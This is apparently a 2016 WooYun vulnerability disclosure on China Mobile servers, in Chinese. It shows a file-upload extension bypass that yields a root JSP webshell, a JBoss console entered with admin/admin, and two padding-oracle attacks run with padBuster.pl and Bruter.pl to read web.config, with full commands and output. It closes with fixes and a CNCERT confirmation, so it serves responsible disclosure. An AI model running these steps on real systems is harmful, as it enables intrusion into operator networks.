当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212792

漏洞标题:运营商安全之中国移动多个漏洞打包(可SHELL内网漫游)

相关厂商:中国移动

漏洞作者: harbour_bin

提交时间:2016-05-26 20:06

修复时间:2016-07-14 09:50

公开时间:2016-07-14 09:50

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-26: 细节已通知厂商并且等待厂商处理中
2016-05-30: 厂商已经确认,细节仅向厂商公开
2016-06-09: 细节向核心白帽子及相关领域专家公开
2016-06-19: 细节向普通白帽子公开
2016-06-29: 细节向实习白帽子公开
2016-07-14: 细节向公众公开

简要描述:

RT

详细说明:

#1 文件上传漏洞
##1.1 证明属于中国移动 http://**.**.**.**/profile/create, 并点击注册

1-1.png


##1.2 文件上传, 上传jpg, 截包后缀名修改为jsp, 从而实现绕过

1-2.png


##1.3 上传成功, 获取Shell
http://**.**.**.**/data/images/2016/05/22/20160522105415_4611.jsp

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root


eth0      Link encap:Ethernet  HWaddr 00:50:56:8C:7D:53  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::250:56ff:fe8c:7d53/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6135649371 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10647266306 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:952335725793 (886.9 GiB)  TX bytes:13808412065401 (12.5 TiB)
eth1      Link encap:Ethernet  HWaddr 00:50:56:8C:7D:54  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::250:56ff:fe8c:7d54/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:62586 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5868 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3901571 (3.7 MiB)  TX bytes:251248 (245.3 KiB)
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:362616740 errors:0 dropped:0 overruns:0 frame:0
          TX packets:362616740 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:29881800131 (27.8 GiB)  TX bytes:29881800131 (27.8 GiB)


? (**.**.**.**) at 00:00:5E:00:01:54 [ether] on eth0
? (**.**.**.**) at 02:1F:A0:00:00:21 [ether] on eth0
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth1
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth0
? (**.**.**.**) at 02:16:3E:55:39:49 [ether] on eth0
? (**.**.**.**) at 7E:2C:0D:04:85:15 [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:51 [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:5C [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:AC [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:55 [ether] on eth0
? (**.**.**.**) at 02:16:3E:50:0E:A1 [ether] on eth0


1-3.png


#2 服务器后台匿名访问
##2.1 http://**.**.**.**:3380/

1-4.png


1-5.png


##2.2 弱口令进入
http://**.**.**.**:3380/admin-console/login.seam?conversationId=96
admin\admin

1-6.png


##2.3 证明危害
**.**.**.**:3380/is/index.jsp 023

eth0      Link encap:Ethernet  HWaddr FA:16:3E:1E:6E:B8  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::f816:3eff:fe1e:6eb8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4026126721 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4603968084 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1079154466212 (1005.0 GiB)  TX bytes:1287649748420 (1.1 TiB)
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:569904 errors:0 dropped:0 overruns:0 frame:0
          TX packets:569904 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:41959898 (40.0 MiB)  TX bytes:41959898 (40.0 MiB)


? (**.**.**.**) at fa:16:3e:24:51:c2 [ether] on eth0
? (**.**.**.**) at 00:00:5e:00:01:70 [ether] on eth0


1-7.png


#3 Padding Oracle Attack两枚
http://**.**.**.**/页面上就有, 不写了, 相应IP为**.**.**.**
##3.1 http://**.**.**.**:8001/

padBuster.pl http://**.**.**.**:8001/WebResource.axd?d=ZBdcbTkhb2X6pzycCd75eQ2 ZBdcbTkhb2X6pzycCd75eQ2 16 -encoding 3 -plaintext "|||~/web.config"


INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       500     3877    N/A
2 **    255     500     5013    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (138/256) [Byte 16]
[+] Success: (138/256) [Byte 15]
[+] Success: (249/256) [Byte 14]
[+] Success: (170/256) [Byte 13]
[+] Success: (20/256) [Byte 12]
[+] Success: (184/256) [Byte 11]
[+] Success: (87/256) [Byte 10]
[+] Success: (114/256) [Byte 9]
[+] Success: (192/256) [Byte 8]
[+] Success: (38/256) [Byte 7]
[+] Success: (205/256) [Byte 6]
[+] Success: (166/256) [Byte 5]
[+] Success: (60/256) [Byte 4]
[+] Success: (78/256) [Byte 3]
[+] Success: (163/256) [Byte 2]
[+] Success: (168/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 342ec0b7794fb52ba8cd2187346d1376
[+] Intermediate Bytes (HEX): 4852bcc95638d04986ae4ee952047477
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


Bruter.pl http://**.**.**.**:8001/ScriptResource.axd NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1 16


Total Requests:11117
Resulting Exploit Block:u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0


http://**.**.**.**:8001/ScriptResource.axd?d=u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0


1-8.png


##3.2 http://**.**.**.**:8003/

padBuster.pl http://**.**.**.**:8003/WebResource.axd?d=t6YDFzeBpU_Lvb8TVusVCg2 t6YDFzeBpU_Lvb8TVusVCg2 16 -encoding 3 -plaintext "|||~/web.config"


INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       500     3877    N/A
2 **    255     500     5013    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (139/256) [Byte 16]
[+] Success: (195/256) [Byte 15]
[+] Success: (236/256) [Byte 14]
[+] Success: (119/256) [Byte 13]
[+] Success: (86/256) [Byte 12]
[+] Success: (10/256) [Byte 11]
[+] Success: (31/256) [Byte 10]
[+] Success: (248/256) [Byte 9]
[+] Success: (70/256) [Byte 8]
[+] Success: (213/256) [Byte 7]
[+] Success: (129/256) [Byte 6]
[+] Success: (1/256) [Byte 5]
[+] Success: (236/256) [Byte 4]
[+] Success: (91/256) [Byte 3]
[+] Success: (225/256) [Byte 2]
[+] Success: (112/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): fc6cd767dc0344d12e859fc1eb7e5875
[+] Intermediate Bytes (HEX): 8010ab19f37421b300e6f0af8d173f74
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


Bruter.pl http://**.**.**.**:8003/ScriptResource.axd _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1 16


Total Requests:10684
Resulting Exploit Block:VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0


http://**.**.**.**:8003/ScriptResource.axd?d=VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0


1-9.png

漏洞证明:

已证明!

修复方案:

1、Padding Oracle Vulnerability漏洞, 安装微软官方补丁;
2、文件上传处, 重新设计, 并删除木马;
3、重新配置JBoss;
4、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-05-30 09:43

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无